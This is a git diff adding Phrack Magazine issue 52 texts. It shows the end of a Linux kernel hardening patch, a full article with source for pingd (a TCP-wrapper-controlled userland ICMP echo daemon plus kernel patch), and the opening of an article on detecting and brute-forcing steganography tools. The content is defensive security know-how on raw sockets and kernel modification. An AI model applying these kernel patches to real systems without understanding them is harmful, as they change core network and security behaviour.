++	!(current->flags & PF_STACKEXEC) \
++	? 0x00110000UL \
++	: TASK_SIZE / 3 )
++#endif
++
+ /*
+  * Size of io_bitmap in longwords: 32 is ports 0-0x3ff.
+  */
+@@ -134,14 +145,6 @@
+ #define alloc_kernel_stack()    __get_free_page(GFP_KERNEL)
+ #define free_kernel_stack(page) free_page((page))
+ 
+-static inline void start_thread(struct pt_regs * regs, unsigned long eip, unsigned long esp)
+-{
+-	regs->cs = USER_CS;
+-	regs->ds = regs->es = regs->ss = regs->fs = regs->gs = USER_DS;
+-	regs->eip = eip;
+-	regs->esp = esp;
+-}
+-
+ /*
+  * Return saved PC of a blocked thread.
+  */
+@@ -151,3 +154,25 @@
+ }
+ 
+ #endif /* __ASM_I386_PROCESSOR_H */
++
++#if defined(current) && !defined(__START_THREAD)
++#define __START_THREAD
++
++static inline void start_thread(struct pt_regs * regs, unsigned long eip, unsigned long esp)
++{
++#ifdef CONFIG_STACKEXEC
++	if (current->flags & PF_STACKEXEC) {
++		regs->cs = USER_HUGE_CS; regs->ss = USER_HUGE_SS;
++	} else {
++		regs->cs = USER_CS; regs->ss = USER_DS;
++	}
++	regs->ds = regs->es = regs->fs = regs->gs = USER_DS;
++#else
++	regs->cs = USER_CS;
++	regs->ds = regs->es = regs->fs = regs->gs = regs->ss = USER_DS;
++#endif
++	regs->eip = eip;
++	regs->esp = esp;
++}
++
++#endif /* __START_THREAD */
+diff -ru linux-stock/include/asm-i386/segment.h linux-patched/include/asm-i386/segment.h
+--- linux-stock/include/asm-i386/segment.h	Tue Apr  9 00:35:29 1996
++++ linux-patched/include/asm-i386/segment.h	Tue Nov 11 00:47:13 1997
+@@ -1,11 +1,27 @@
+ #ifndef _ASM_SEGMENT_H
+ #define _ASM_SEGMENT_H
+ 
++#include <linux/config.h>
++
+ #define KERNEL_CS	0x10
+ #define KERNEL_DS	0x18
+ 
+ #define USER_CS		0x23
+ #define USER_DS		0x2B
++
++#ifdef CONFIG_STACKEXEC
++#define USER_HUGE_CS	0x32
++#define USER_HUGE_SS	0x3A
++#else
++#define USER_HUGE_CS	0x23
++#define USER_HUGE_SS	0x2B
++#endif
++
++/*
++ * Magic address to return to the kernel from signal handlers, any address
++ * beyond user code segment limit will do.
++ */
++#define MAGIC_SIGRETURN	0xC1428571
+ 
+ #ifndef __ASSEMBLY__
+ 
+diff -ru linux-stock/include/linux/a.out.h linux-patched/include/linux/a.out.h
+--- linux-stock/include/linux/a.out.h	Sat Aug 17 11:19:28 1996
++++ linux-patched/include/linux/a.out.h	Tue Nov 11 00:47:21 1997
+@@ -37,6 +37,9 @@
+   M_MIPS2 = 152,	/* MIPS R6000/R4000 binary */
+ };
+ 
++/* Constants for the N_FLAGS field */
++#define F_STACKEXEC	1	/* Executable stack area forced */
++
+ #if !defined (N_MAGIC)
+ #define N_MAGIC(exec) ((exec).a_info & 0xffff)
+ #endif
+diff -ru linux-stock/include/linux/elf.h linux-patched/include/linux/elf.h
+--- linux-stock/include/linux/elf.h	Sat Aug 10 00:03:15 1996
++++ linux-patched/include/linux/elf.h	Tue Nov 11 00:47:39 1997
+@@ -57,6 +57,9 @@
+  */
+ #define EM_ALPHA	0x9026
+ 
++/* Constants for the e_flags field */
++#define EF_STACKEXEC	1	/* Executable stack area forced */
++
+ 
+ /* This is the info that is needed to parse the dynamic section of the file */
+ #define DT_NULL		0
+diff -ru linux-stock/include/linux/kernel.h linux-patched/include/linux/kernel.h
+--- linux-stock/include/linux/kernel.h	Thu Aug 14 10:05:47 1997
++++ linux-patched/include/linux/kernel.h	Tue Nov 11 00:47:44 1997
+@@ -78,6 +78,27 @@
+         (((addr) >> 16) & 0xff), \
+         (((addr) >> 24) & 0xff)
+ 
++#define security_alert(msg) { \
++	static unsigned long warning_time = 0, no_flood_yet = 0; \
++\
++/* Make sure at least one minute passed since the last warning logged */ \
++	if (!warning_time || jiffies - warning_time > 60 * HZ) { \
++		warning_time = jiffies; no_flood_yet = 1; \
++		printk( \
++			KERN_ALERT \
++			"Possible " msg " exploit attempt:\n" \
++			KERN_ALERT \
++			"Process %s (pid %d, uid %d, euid %d).\n", \
++			current->comm, current->pid, \
++			current->uid, current->euid); \
++	} else if (no_flood_yet) { \
++		warning_time = jiffies; no_flood_yet = 0; \
++		printk( \
++			KERN_ALERT \
++			"More possible " msg " exploit attempts follow.\n"); \
++	} \
++}
++
+ #endif /* __KERNEL__ */
+ 
+ #define SI_LOAD_SHIFT	16
+diff -ru linux-stock/include/linux/sched.h linux-patched/include/linux/sched.h
+--- linux-stock/include/linux/sched.h	Wed Oct 15 15:22:05 1997
++++ linux-patched/include/linux/sched.h	Tue Nov 11 00:47:48 1997
+@@ -269,6 +269,8 @@
+ #define PF_USEDFPU	0x00100000	/* Process used the FPU this quantum (SMP only) */
+ #define PF_DTRACE	0x00200000	/* delayed trace (used on m68k) */
+ 
++#define PF_STACKEXEC	0x01000000	/* Executable stack area forced */
++
+ /*
+  * Limit the stack by to some sane default: root can always
+  * increase this limit if needed..  8MB seems reasonable.
+@@ -490,6 +492,9 @@
+ 
+ #define for_each_task(p) \
+ 	for (p = &init_task ; (p = p->next_task) != &init_task ; )
++
++/* x86 start_thread() */
++#include <asm/processor.h>
+ 
+ #endif /* __KERNEL__ */
+ 
+diff -ru linux-stock/kernel/sched.c linux-patched/kernel/sched.c
+--- linux-stock/kernel/sched.c	Fri Oct 17 13:17:43 1997
++++ linux-patched/kernel/sched.c	Sun Nov  9 01:11:01 1997
+@@ -44,7 +44,11 @@
+  * kernel variables
+  */
+ 
++#ifdef  CONFIG_SECURE_ON
++int securelevel = 1;			/* system security level */
++#else
+ int securelevel = 0;			/* system security level */
++#endif
+ 
+ long tick = (1000000 + HZ/2) / HZ;	/* timer interrupt period */
+ volatile struct timeval xtime;		/* The current time */
+diff -ru linux-stock/mm/mmap.c linux-patched/mm/mmap.c
+--- linux-stock/mm/mmap.c	Fri Nov 22 06:25:17 1996
++++ linux-patched/mm/mmap.c	Tue Nov 11 00:48:26 1997
+@@ -308,7 +308,11 @@
+ 	if (len > TASK_SIZE)
+ 		return 0;
+ 	if (!addr)
++#ifdef MMAP_ADDR
++		addr = MMAP_ADDR;
++#else
+ 		addr = TASK_SIZE / 3;
++#endif
+ 	addr = PAGE_ALIGN(addr);
+ 
+ 	for (vmm = find_vma(current->mm, addr); ; vmm = vmm->vm_next) {
+
+
+diff -ru linux-stock/net/ipv4/af_inet.c linux-patched/net/ipv4/af_inet.c
+--- linux/net/ipv4/af_inet.c	Fri Aug 15 12:23:23 1997
++++ linux-stock/net/ipv4/af_inet.c	Mon Dec 29 18:05:29 1997
+@@ -111,6 +111,15 @@
+ 
+ #define min(a,b)	((a)<(b)?(a):(b))
+ 
++#ifdef  CONFIG_SPLIT_GID
++/* 
++ *  Priveleged group ids
++ */
++#define PROT_SOCK_GID   16
++#define RAW_SOCK_GID    17
++#define PACKET_SOCK_GID 18
++#endif  /* CONFIG_SPLIT_GID */
++
+ extern struct proto packet_prot;
+ extern int raw_get_info(char *, char **, off_t, int, int);
+ extern int snmp_get_info(char *, char **, off_t, int, int);
+@@ -435,8 +444,26 @@
+ 		sk->no_check = UDP_NO_CHECK;
+ 		prot=&udp_prot;
+ 	} else if(sock->type == SOCK_RAW || sock->type == SOCK_PACKET) {
++#ifdef  CONFIG_SPLIT_GID
++                /*
++                 *  If we are not the super user, check to see if we have the
++                 *  corresponding special group priviledge.
++                 */ 
++                if (!suser())
++                {
++                    if (sock->type == SOCK_RAW && current->egid != RAW_SOCK_GID)
++                    {
++                        goto free_and_badperm;
++                    }
++                    else if (sock->type == SOCK_PACKET && current->egid != PACKET_SOCK_GID)
++                    {
++                        goto free_and_badperm;
++                    }
++                }
++#else
+ 		if (!suser()) 
+ 			goto free_and_badperm;
++#endif  /* CONFIG_SPLIT_GID */
+ 		if (!protocol) 
+ 			goto free_and_noproto;
+ 		prot = &raw_prot;
+@@ -621,7 +648,11 @@
+ 	if (snum == 0) 
+ 		snum = sk->prot->good_socknum();
+         if (snum < PROT_SOCK) {
++#ifdef  CONFIG_SPLIT_GID
++		if (!suser() && current->egid != PROT_SOCK_GID) 
++#else
+ 		if (!suser()) 
++#endif  /* CONFIG_SPLIT_GID */
+ 		return(-EACCES);
+ 		if (snum == 0)
+ 			return(-EAGAIN);
+<-->
+
+
+----[  EOF
+
diff --git a/phrack52/7.txt b/phrack52/7.txt
new file mode 100644
index 0000000..e6a210f
--- /dev/null
+++ b/phrack52/7.txt
@@ -0,0 +1,551 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 07 of 20
+
+
+-------------------------[  Linux Ping Daemon
+
+
+--------[  route|daemon9 <route@infonexus.com>
+
+
+
+
+----[  Introduction and Impetus
+
+
+    I have an idea.  How about we rip ICMP_ECHO support from the kernel?  How
+about we employ a userland daemon that controls ICMP_ECHO reflection via TCP
+wrapper access control?  (Actually, this idea was originally (c) Asriel, who
+did the 44BSD version.  http://www.enteract.com/~tqbf/goodies.html.  He just
+asked me to do the linux version.)
+
+    The bastard son of this idea is pingd.  A cute userland daemon that 
+handles all ICMP_ECHO and ICMP_ECHOREPLY traffic.  The engine is simple.  A
+raw ICMP socket under Linux gets a copy of every ICMP datagram delivered to 
+the IP module (assuming the IP datagram is destined for an interface on that
+host).  We simply remove support of ICMP_ECHO processing from the kernel and
+erect a userland daemon with a raw ICMP socket to handle these packets.
+
+    Once we have the packet, we do some basic sanity checks such as packet
+type and code, and packet size.  Next, we pass the packet to the authentication
+mechanism where it is checked against the access control list.  If the packet
+is allowed, we send a response, otherwise we drop it on the floor.
+
+    The rule for this project was primarily security and then efficiency.  The
+next version will have an option to send ICMP_HOST_UNREACH to an offending
+host.  I may also at some point add some hooks for some sort of payload
+content analysis (read: LOKI detection) but for now, pingd stands as is.
+
+
+----[  Compilation and Installation
+
+
+i.  You will need libwrap and libnet.  Libwrap comes with Wieste Venema's Tcp
+    wrapper package and is available from ftp://ftp.win.tue.nl/pub/security/.
+    The libnet networking library is available from: 
+    http://www.infonexus.com/~daemon9/Projects/libnet.tar.gz.
+
+ii. Build and install both libraries according to their respective instructions.
+
+1.  Build the program and apply the kernel patch.
+
+        `make all` OR (`make pingd` AND `make patch`)
+
+1a. Recompile your kernel.  It is NOT necessary to make {config, dep, clean}.
+    It is only necessary to:
+    
+        `make; make install`
+
+    (or the equivalent).
+
+2.  Test the daemon.  Ensure that there are no wrapper entries in the 
+    /etc/hosts.{deny, allow} and start the daemon in debug mode.
+
+        `./pingd -d1` and then `ping 0`
+
+3.  Edit your TCP wrapper access control files.  Simply add a new service
+    (ping) and the IP addresses you want to allow or deny:
+
+        `cat >> /etc/hosts.deny`
+          ping : evil.com
+
+        ^D
+
+4.  Install the program and add it to your /etc/rc.d/rc/local:
+
+        `make install`
+
+
+----[  Empirical Data
+
+
+    This is slower then doing it in the kernel.  Especially on localhost.  How
+about that.  Remotely, the RTT's are about .7 - .9 ms longer with a concise
+/etc/hosts.{allow,deny}.  This is the price you pay for a more secure
+implementation.  All the hosts are on the same 10MB network, with
+approximately the same speed NICs.
+
+
+    The following Linux machine has a normal kernel-based ICMP_ECHO reflector
+    mechanism:
+
+resentment:~/# ping 192.168.2.34
+PING 192.168.2.34 (192.168.2.34): 56 data bytes
+64 bytes from 192.168.2.34: icmp_seq=0 ttl=64 time=0.8 ms
+64 bytes from 192.168.2.34: icmp_seq=1 ttl=64 time=0.6 ms
+64 bytes from 192.168.2.34: icmp_seq=2 ttl=64 time=0.8 ms
+
+--- 192.168.2.34 ping statistics ---
+3 packets transmitted, 3 packets received, 0% packet loss
+round-trip min/avg/max = 0.6/0.7/0.8 ms
+
+
+    This machine is running pingd compiled with DLOG (and has no kernel
+    ICMP_ECHO support):
+
+resentment:~/# ping 192.168.2.35
+PING 192.168.2.35 (192.168.2.35): 56 data bytes
+64 bytes from 192.168.2.35: icmp_seq=0 ttl=64 time=1.5 ms
+64 bytes from 192.168.2.35: icmp_seq=1 ttl=64 time=1.4 ms
+64 bytes from 192.168.2.35: icmp_seq=2 ttl=64 time=1.3 ms
+
+--- 192.168.2.35 ping statistics ---
+3 packets transmitted, 3 packets received, 0% packet loss
+round-trip min/avg/max = 1.3/1.4/1.5 ms
+
+
+    Stress-test of the same host (not recommended to do with debugging on):
+
+torment# /sbin/ping -f -c 10000 192.168.2.35
+PING 192.168.2.35 (192.168.2.35): 56 data bytes
+............................................................................
+--- 192.168.2.35 ping statistics ---
+10088 packets transmitted, 10000 packets received, 0% packet loss
+round-trip min/avg/max = 0.985/36.790/86.075 ms
+
+resentment:~# ping -f -c 10000 192.168.2.35
+PING 192.168.2.35 (192.168.2.35): 56 data bytes
+..
+--- 192.168.2.35 ping statistics ---
+10001 packets transmitted, 10000 packets received, 0% packet loss
+round-trip min/avg/max = 1.0/1.2/17.4 ms
+
+
+    An example of the wrapper log:
+
+Jan 16 18:23:03 shattered pingd: started: 997
+Jan 16 18:24:52 shattered pingd: ICMP_ECHO allowed by wrapper
+(64 bytes from 192.168.2.38)
+Jan 16 18:24:54 shattered last message repeated 2 times
+Jan 16 18:26:50 shattered pingd: ICMP_ECHO allowed by wrapper
+(64 bytes from 192.168.2.37)
+Jan 16 18:26:58 shattered last message repeated 10087 times
+Jan 16 18:30:09 shattered pingd: ICMP_ECHO allowed by wrapper
+(64 bytes from 192.168.2.38)
+Jan 16 18:30:19 shattered last message repeated 10000 times
+Jan 16 18:47:30 shattered pingd: ICMP_ECHO denied by wrapper
+(64 bytes from 192.168.2.34)
+Jan 16 18:47:32 shattered last message repeated 2 times
+Jan 16 18:48:16 shattered pingd: packet too large
+(10008 bytes from 192.168.2.38)
+Jan 16 18:48:17 shattered last message repeated 2 times
+
+
+----[  The code
+
+
+<++> Pingd/Makefile
+# linux pingd Makefile
+# daemon9|route <route@infonexus.com>
+
+#   Define this if you want syslog logging of ICMP_ECHO traffic.  This slows
+#   slow down daemon response time a bit.
+#   default: enabled.
+DEFINES     =   -DLOG
+
+CC          =   gcc
+VER         =   0.1
+NETSRC      =   /usr/src/linux/net/ipv4
+INSTALL_LOC =   /usr/sbin
+PINGD       =   pingd
+LIBS        =   -lnet -lwrap
+DEFINES     +=   -D__BSD_SOURCE
+CFLAGS      =   -O3 -funroll-loops -fomit-frame-pointer -pipe -m486 -Wall
+OBJECTS     =   pingd.o
+
+.c.o:
+	$(CC) $(CFLAGS) $(DEFINES) -c $< -o $@
+
+pingd:  $(OBJECTS)
+	$(CC) $(CFLAGS) $(OBJECTS) -o pingd $(LIBS)
+	strip pingd
+
+all: patch pingd
+
+patch:
+	@(/usr/bin/patch -d $(NETSRC) < patchfile)
+	@(echo "Patchfile installed")
+	@(echo "You must now recompile your kernel")
+	@(echo "")
+
+install: pingd
+	(install -m755 $(PINGD) $(INSTALL_LOC))
+	(echo ""                              >> /etc/rc.d/rc.local)
+	(echo "echo \"Starting ping daemon\"" >> /etc/rc.d/rc.local)
+	(echo "$(INSTALL_LOC)/$(PINGD)"       >> /etc/rc.d/rc.local)
+
+dist:   clean
+	@(cd ..; rm pingd-$(VER).tgz; tar cvzf pingd-$(VER).tgz Pingd/)
+
+clean:
+	rm -f *.o core pingd
+# EOF
+<-->
+<++> Pingd/pingd.h
+/*
+ *  $Id$
+ *
+ *  Linux pingd sourcefile
+ *  pingd.h - function prototypes, global data structures, and macros
+ *  Copyright (c) 1998 by daemon9|route (route@infonexus.com)
+ *
+ *
+ *
+ */
+
+#ifndef _PINGD_H
+#define _PINGD_H
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+#include <netinet/in.h>
+#include <netinet/ip.h>
+#include <netinet/ip_icmp.h>
+#include <pwd.h>
+#include <syslog.h>
+#include <sys/types.h>
+#include <sys/socket.h>
+#include <libnet.h>
+
+#define NOBODY          "nobody"        /* Nobody pwnam */
+#define STRING_UNKNOWN  "unknown"       /* From tcpd.h */
+#define HEADER_MATERIAL 28              /* ICMP == 8 bytes, IP == 20 bytes */
+#define MAX_PAYLOAD     8096            /* Out of thin air */
+
+struct icmp_packet
+{
+    struct ip iph;
+    struct icmphdr icmph;
+    u_char payload[MAX_PAYLOAD];
+};
+
+
+/* F U N C T I O N    P R O T O T Y P E S */
+
+
+void
+usage(
+    char *                  /* pointer to argv[0] */
+    );
+
+int                         /* 1 if the packet is allowed, 0 if denied */
+verify(
+    struct icmp_packet *    /* pointer to the ICMP packet in question */
+    );
+
+void
+icmp_reflect(
+    struct icmp_packet *,   /* pointer to the ICMP packet in question */
+    int                     /* socket file descriptor */
+    );
+
+int                         /* 1 if access is granted, 0 if denied */
+hosts_ctl(
+    char *,                 /* daemon name */
+    char *,                 /* client name (canonical) */
+    char *,                 /* client address (dots 'n' decimals) */
+    char *                  /* client user (unused) */
+    );
+
+#endif  /* _PINGD_H */
+
+/* EOF */
+<-->
+<++> Pingd/pingd.c
+/*
+ *  $Id$
+ *
+ *  Linux pingd sourcefile
+ *  ping.c - main sourcefile
+ *  Copyright (c) 1998 by daemon9|route <route@infonexus.com>
+ *
+ *  
+ *
+ *  $Log$
+ */
+
+#include "pingd.h"
+
+int d           = 0;                /* Debuging level (defaults off) */
+int max_packet  = 1024;             /* Maximum packet size (default) */
+
+int
+main(int argc, char **argv)
+{
+    int sock_fd, c;
+    struct icmp_packet i_pack;
+    struct passwd *pwd_p;
+
+    /*
+     *  Make sure we have UID 0.
+     */
+    if (geteuid() || getuid())
+    {
+        fprintf(stderr, "Inadequate privledges\n");
+        exit(1);
+    }
+
+    /*
+     *  Open a raw ICMP socket and set IP_HDRINCL.
+     */
+    if ((sock_fd = open_raw_sock(IPPROTO_ICMP)) == -1)
+    {
+        perror("socket allocation");
+        exit(1);
+    }
+
+    /*
+     *  Now that we have the raw socket, we no longer need root privledges
+     *  so we drop our UID to nobody.
+     */
+    if (!(pwd_p = getpwnam(NOBODY))) 
+    {
+        fprintf(stderr, "Can't get pwnam info on nobody");
+        exit(1);
+    }
+    else if (setuid(pwd_p->pw_uid) == -1)
+    {
+        perror("Can't drop privledges");
+        exit(1);
+    }
+
+    while((c = getopt(argc, argv, "d:s:")) != EOF)
+    {
+        switch (c)
+        {
+            case 'd':
+                d = atoi(optarg);
+                break;
+
+            case 's':
+                max_packet = atoi(optarg);
+                break;
+
+            default:
+                usage(argv[0]);
+        }
+    }
+
+    if (!d) daemon();
+    if (d) fprintf(stderr, "Max packetsize of %d bytes\n", max_packet);
+
+#ifdef  LOG
+    openlog("pingd", 0, 0);
+    syslog(LOG_DAEMON|LOG_INFO, "started: %d", getpid());
+#endif  /* LOG */
+    /*
+     *  We're powered up.  From here on out, everything should run swimmingly.
+     */
+    for (;;)
+    {
+        bzero(&i_pack, sizeof(i_pack));
+        c = recv(sock_fd, (struct icmp_packet *)&i_pack, sizeof(i_pack), 0);
+        if (c == -1)
+        {
+            if (d) fprintf(stderr, "truncated read: %s", strerror(errno));
+            continue;
+        }
+
+        /*
+         *  Make sure packet isn't too small or too big.
+         */
+        if (c < HEADER_MATERIAL || c > max_packet)
+        {
+#ifdef  LOG
+            syslog(
+                    LOG_DAEMON|LOG_INFO,
+                    "bad packet size (%d bytes from %s)",
+                    ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph),
+                    host_lookup(i_pack.iph.ip_src.s_addr));
+#endif  /* LOG */
+            continue;
+        }
+
+        /*
+         *  We only want ICMP_ECHO packets.
+         */
+        if (i_pack.icmph.type != ICMP_ECHO) continue;
+        else if (d)
+                fprintf(stderr,
+                "%d byte ICMP_ECHO from %s\n",
+                ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph),
+                host_lookup(i_pack.iph.ip_src.s_addr));
+
+        /*
+         *  Pass packet to the access control mechanism.
+         */
+        if (!verify(&i_pack))
+        {
+#ifdef  LOG
+            syslog(
+                    LOG_DAEMON|LOG_INFO,
+                    "ICMP_ECHO denied by wrapper (%d bytes from %s)",
+                    ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph),
+                    host_lookup(i_pack.iph.ip_src.s_addr));
+#endif  /* LOG */
+        }
+        else 
+        {
+#ifdef  LOG
+            syslog(
+                    LOG_DAEMON|LOG_INFO,
+                    "ICMP_ECHO allowed by wrapper (%d bytes from %s)",
+                    ntohs(i_pack.iph.ip_len) - sizeof(i_pack.iph),
+                    host_lookup(i_pack.iph.ip_src.s_addr));
+#endif  /* LOG */
+            icmp_reflect(&i_pack, sock_fd);
+        }
+    }
+}
+
+
+void
+icmp_reflect(struct icmp_packet *p_ptr, int sock_fd)
+{
+    int c;
+    u_long tmp;
+    struct sockaddr_in sin;
+
+    bzero((struct sockaddr_in *)&sin, sizeof(sin));
+    /*
+     *  Formulate ICMP_ECHOREPLY response packet.  All we do change the
+     *  packet type and flip the IP addresses.  This avoids a copy.
+     */
+    tmp = p_ptr->iph.ip_dst.s_addr;
+    p_ptr->iph.ip_dst.s_addr = p_ptr->iph.ip_src.s_addr;
+    p_ptr->iph.ip_src.s_addr = tmp;
+    p_ptr->icmph.type        = ICMP_ECHOREPLY;
+    p_ptr->icmph.checksum    = 0;
+    p_ptr->icmph.checksum    =
+                        ip_check((u_short *)&p_ptr->icmph,
+                        ntohs(p_ptr->iph.ip_len) - sizeof(struct ip));
+    sin.sin_family      = AF_INET;
+    sin.sin_addr.s_addr = p_ptr->iph.ip_dst.s_addr; 
+
+    c = sendto(sock_fd,
+            (struct icmp_packet *)p_ptr,
+            ntohs(p_ptr->iph.ip_len),
+            0,
+            (struct sockaddr *) &sin, sizeof(sin));
+
+    if (c != ntohs(p_ptr->iph.ip_len))
+    {
+        if (d) perror("truncated write");
+        return;
+    }
+    else if (d) fprintf(stderr, "ICMP_ECHOREPLY sent\n");
+}
+
+
+int
+verify(struct icmp_packet *p_ptr)
+{
+    if (!hosts_ctl("ping", 
+                    host_lookup(p_ptr->iph.ip_src.s_addr),
+                    host_lookup(p_ptr->iph.ip_src.s_addr),
+                    STRING_UNKNOWN))
+        return (0);
+
+    else return (1);
+}
+
+
+void
+usage(char *argv0)
+{
+    fprintf(stderr, "usage: %s [-d 1|0 ] [-s maxpacketsize] \n",argv0);
+    exit(0);
+}
+
+
+/* EOF */
+<-->
+<++> Pingd/patchfile
+--- /usr/src/linux/net/ipv4/icmp.c.original	Sat Jan 10 11:10:36 1998
++++ /usr/src/linux/net/ipv4/icmp.c	Sat Jan 10 11:19:23 1998
+@@ -42,7 +42,8 @@
+  *              Elliot Poger    :       Added support for SO_BINDTODEVICE.
+  *	Willy Konynenberg	:	Transparent proxy adapted to new
+  *					socket hash code.
+- *
++ *              route           :       1.10.98:  ICMP_ECHO / ICMP_ECHOREQUEST
++ *                                      support into userland.
+  *
+  * RFC1122 (Host Requirements -- Comm. Layer) Status:
+  * (boy, are there a lot of rules for ICMP)
+@@ -882,28 +883,6 @@
+   	kfree_skb(skb, FREE_READ);
+ }
+ 
+-/*
+- *	Handle ICMP_ECHO ("ping") requests. 
+- *
+- *	RFC 1122: 3.2.2.6 MUST have an echo server that answers ICMP echo requests.
+- *	RFC 1122: 3.2.2.6 Data received in the ICMP_ECHO request MUST be included in the reply.
+- *	RFC 1812: 4.3.3.6 SHOULD have a config option for silently ignoring echo requests, MUST have default=NOT.
+- *	See also WRT handling of options once they are done and working.
+- */
+- 
+-static void icmp_echo(struct icmphdr *icmph, struct sk_buff *skb, struct device *dev, __u32 saddr, __u32 daddr, int len)
+-{
+-#ifndef CONFIG_IP_IGNORE_ECHO_REQUESTS
+-	struct icmp_bxm icmp_param;
+-	icmp_param.icmph=*icmph;
+-	icmp_param.icmph.type=ICMP_ECHOREPLY;
+-	icmp_param.data_ptr=(icmph+1);
+-	icmp_param.data_len=len;
+-	if (ip_options_echo(&icmp_param.replyopts, NULL, daddr, saddr, skb)==0)
+-		icmp_build_xmit(&icmp_param, daddr, saddr, skb->ip_hdr->tos);
+-#endif
+-	kfree_skb(skb, FREE_READ);
+-}
+ 
+ /*
+  *	Handle ICMP Timestamp requests. 
+@@ -1144,8 +1123,8 @@
+  */
+  
+ static struct icmp_control icmp_pointers[19] = {
+-/* ECHO REPLY (0) */
+- { &icmp_statistics.IcmpOutEchoReps, &icmp_statistics.IcmpInEchoReps, icmp_discard, 0, NULL },
++/* ECHO REPLY (0) - Disabled, we now do ICMP_ECHOREQUEST in userland */
++ { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+ /* DEST UNREACH (3) */
+@@ -1156,8 +1135,8 @@
+  { &icmp_statistics.IcmpOutRedirects, &icmp_statistics.IcmpInRedirects, icmp_redirect, 1, &xrl_redirect },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+-/* ECHO (8) */
+- { &icmp_statistics.IcmpOutEchos, &icmp_statistics.IcmpInEchos, icmp_echo, 0, NULL },
++/* ECHO (8) - Disabled, we now do ICMP_ECHOREQUEST in userland */
++ { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+  { &dummy, &icmp_statistics.IcmpInErrors, icmp_discard, 1, NULL },
+ /* TIME EXCEEDED (11) */
+<-->
+
+----[  EOF
+
diff --git a/phrack52/8.txt b/phrack52/8.txt
new file mode 100644
index 0000000..e273bc2
--- /dev/null
+++ b/phrack52/8.txt
@@ -0,0 +1,784 @@
+---[  Phrack Magazine   Volume 8, Issue 52 January 26, 1998, article 08 of 20
+
+
+-------------------------[  Steganography Thumbprinting
+
+
+--------[  The HackLab (http://www.hacklab.com)
+
+
+
+Steg`a*nog"ra*phy (?), n. [Gr. covered (fr. to cover closely) +
+   -graphy.] The art of writing in cipher, or in characters which are not
+   intelligible except to persons who have the key; cryptography.  
+
+
+i. Introduction
+
+    While this may be a general description of cryptography, steganography has
+come to describe not only the act of encrypting data, but also of hiding its
+very existence.  Steganography (or "stego") uses techniques to store a
+"message" file within a "container" file by altering the container file in
+such a way as to make the original file _appear_ unchanged.  The resulting
+file can be referred to as the stego file and contains the message file
+enclosed in a close approximation of the original container file.  Several
+tools exist (mostly for DOS/Windows/NT) which automate these functions using
+DES, DES3 or IDEA as encryption methods and BMP, GIF, JPG, WAV, VOC and even
+ASCII files as containers.  Using these tools, data can be hidden within
+images, sounds, and even other data files.  However, these tools do leave
+perceptible traces on their container files and do not offer nearly the
+level of obfuscation the user assumes.
+    
+    This article will provide the reader with a fundamental understanding of
+basic stego techniques and will highlight some of the "thumbprints" left by
+modern steganographic toolsets, specifically on graphic images.  Not intended
+to challenge the cryptographic strength or perceptible mathematical variances
+of current steganographic techniques, this article will give the reader a
+basic understanding of stego and suggest low-budget methods for detecting and
+cracking basic steganographic techniques.  Also presented is a program which
+can be used to brute-force two of the most popular stego toolsets.
+
+
+I. Basic Steganography
+
+
+    Simply put, steganography involves the hiding of messages.  While there are
+many techniques employed by the various tools, the least common denominator
+amongst most toolsets is the modification of some of the Least Significant
+Bits (or LSBs) of the container file's individual bytes.  In the simplest
+example, consider the following binary representations of the numbers 20
+through 27:
+
+10100 10101 10110 10111 11000 11001 11010 11011
+
+    By modifying the LSBs of these binary digits, we can hide the binary
+representation of the number 200 (11001000) across the above bytestream:
+
+10101 10101 10110 10110 11001 11000 11010 11010
+
+    By reconstructing the LSBs of the above bytestream, we recover the number
+200 (11001000). In the above example, the original bytestream of the numbers
+20-27 is the container, while the number 200 is the message file.  This is a
+very poor basic example since the resulting stego file is not an accurate
+representation of the original file.  After modification to include the
+message file, the numbers 20-27 now read:
+ 
+21 21 22 22 25 24 26 26
+
+    However, in most stego applications, the container file does not contain
+bytestreams which are rendered useless by modifying LSB information.
+Instead, container files typically contain various levels of "noise" at the
+level of the LSB's which when viewed apart from the rest of the byte can
+appear random.  A sound (.WAV) file, for example contains mostly inaudible
+background noise at the LSB level.  An 8-bit graphic file will contain minor
+color differences at the LSB level, while a 24-bit image will contain color
+changes which are nearly imperceptible to the human eye.  A very common
+container format is a 256 color, 8 bit image such as a GIF or BMP file.
+
+
+II. Stego Techniques
+
+
+    In an 8-bit image such as a GIF or BMP each pixel is described as a number
+from 0 - 255 which refers to an actual color in the "color lookup table" or
+palette.  A common misconception is that all images simply contain strings of
+bytes that describe individual colors, and that the graphic file simply
+lists these colors in left-to-right, and top-to-bottom fashion.  This is
+only partially true for 8-bit images.  The palette lists every color that is
+used in the image (and extra colors, if less than 256 total colors are actually
+used in the image), and the image data itself is stored as a series of digits
+from 0 - 255 which reference an entry in the palette.  In this way, the image
+can be reconstructed by performing palette lookups to determine the color to
+insert at that pixel location.
+
+    In order to hide data within an 8-bit GIF or BMP container, most existing
+tools use one of two techniques which I will term LSB palette reference
+modification and RGB element LSB modification.
+
+    LSB palette reference modification involves changing the LSB(s) of a
+_palette_reference_ (0 - 255) in order to hide the data contained in the
+message.  Remember that a palette reference simply contains a number from 0 -
+255 which references a color, or entry, in the palette.  In order to hide
+data, a program utilizing palette reference modification may decide which
+color to point to based on the color's LSBs.  This type of program will pay
+no attention to how similar the colors are, only whether or not the LSBs
+serve its purpose of data hiding.  If the adjacent colors in the palette have
+dissimilar LSBs, they are well suited for data hiding and become good
+candidates for storing hidden text in the final stegoed container.  If a 0
+(zero) is meant to be hidden, the stego program inserts the palette index
+reference of the color with the LSB of 0 (zero), and vice versa for hiding a
+1 (one).
+
+    RGB element LSB modification involves modifying the pixel's _actual_color_
+by changing the LSB of the Red, Green or Blue elements of the color in the
+color table.  For example, the color "white" is represented by the RGB values
